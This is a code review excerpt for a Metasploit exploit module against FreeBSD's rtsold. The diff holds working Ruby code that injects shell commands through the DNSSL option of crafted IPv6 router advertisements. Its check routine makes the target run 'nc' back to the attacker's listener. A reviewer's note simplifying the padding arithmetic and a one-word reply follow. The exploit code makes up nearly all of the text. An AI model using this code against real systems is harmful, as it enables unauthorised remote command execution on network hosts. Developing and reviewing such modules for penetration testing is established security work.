modules/exploits/freebsd/misc/rtsold_dnssl_cmdinject.rb

```diff
@@ -0,0 +1,261 @@
+    lport = datastore['LPORT'] || rand(44444..45444)
+    service = nil
+    client = nil
+
+    begin
+      service = Rex::Socket::TcpServer.create(
+        'LocalHost' => lhost,
+        'LocalPort' => lport,
+        'SSL' => false,
+        'Context' => {
+          'Msf' => framework,
+          'MsfExploit' => self
+        }
+      )
+
+      vprint_status("Started check listener on #{lhost}:#{lport}")
+
+      check_cmd = "nc -w 5 #{lhost} #{lport}"
+      vprint_status("Sending RA packets with check payload: #{check_cmd}")
+
+      send_ra_packets(check_cmd)
+
+      vprint_status('Waiting for connection...')
+
+      Timeout.timeout(10) do
+        client = service.accept
+        if client
+          vprint_good("Connection received from #{client.peerhost}")
+          return CheckCode::Vulnerable('Target connected back via encoded payload')
+        end
+      end
+    rescue Timeout::Error
+      return CheckCode::Safe('No connection received within timeout')
+    rescue RuntimeError => e
+      return CheckCode::Unknown("Pcaprub error: #{e}")
+    rescue StandardError => e
+      return CheckCode::Unknown("Error during check: #{e.class} - #{e}")
+    ensure
+      client.close if client
+      service.close if service
+    end
+
+    CheckCode::Safe
+  end
+
+  def send_ra_packets(cmd)
+    interface = datastore['INTERFACE'] || ::Pcap.lookupdev
+    count = datastore['COUNT']
+    delay_ms = datastore['DELAY']
+
+    begin
+      smac = get_mac(interface)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Cannot get MAC address for interface #{interface}: #{e}")
+    end
+
+    begin
+      open_pcap('INTERFACE' => interface, 'ARPCAP' => false)
+    rescue StandardError => e
+      fail_with(Failure::BadConfig, "Cannot open pcap on interface #{interface}: #{e}")
+    end
+
+    pkt = build_ra_packet(smac, cmd)
+    count.times do |i|
+      inject(pkt.to_s)
+      Rex.sleep(delay_ms / 1000.0) if i < count - 1
+    end
+
+    close_pcap
+  end
+
+  def encode_domain(name)
+    result = ''
+    name.split('.').each do |label|
+      next if label.empty?
+
+      data = label.encode('ASCII-8BIT')
+      result << [data.length].pack('C') << data
+    end
+    result << "\x00"
+  end
+
+  def encode_payload(cmd)
+    payload_str = "$(#{cmd})"
+    payload_bytes = payload_str.encode('ASCII-8BIT')
+
+    if payload_bytes.length <= 63
+      return [payload_bytes.length].pack('C') + payload_bytes + "\x00"
+    end
+
+    result = ''
+    until payload_bytes.empty?
+      chunk = payload_bytes.slice!(0, 63)
+      result << [chunk.length].pack('C') << chunk
+    end
+    result << "\x00"
+  end
+
+  # Build DNSSL option (RFC 6106 Section 5.2)
+  def build_dnssl_option(cmd, lifetime = 0xFFFFFFFF)
+    data = encode_domain("#{rand_text_alpha(6..10)}.local") + encode_payload(cmd)
+
+    # Pad to 8-byte boundary (option header is 8 bytes)
+    total_len = 8 + data.length
+    pad_len = (8 - (total_len % 8)) % 8
```

Comment:
```suggestion
    pad_len = -data.length % 8
```

- No need to add `8` to `data.length` as we're taking it `mod 8`
- No need to apply modulo twice
- `(8 - N) % 8` is equivalent to `-N % 8`

Reply:
done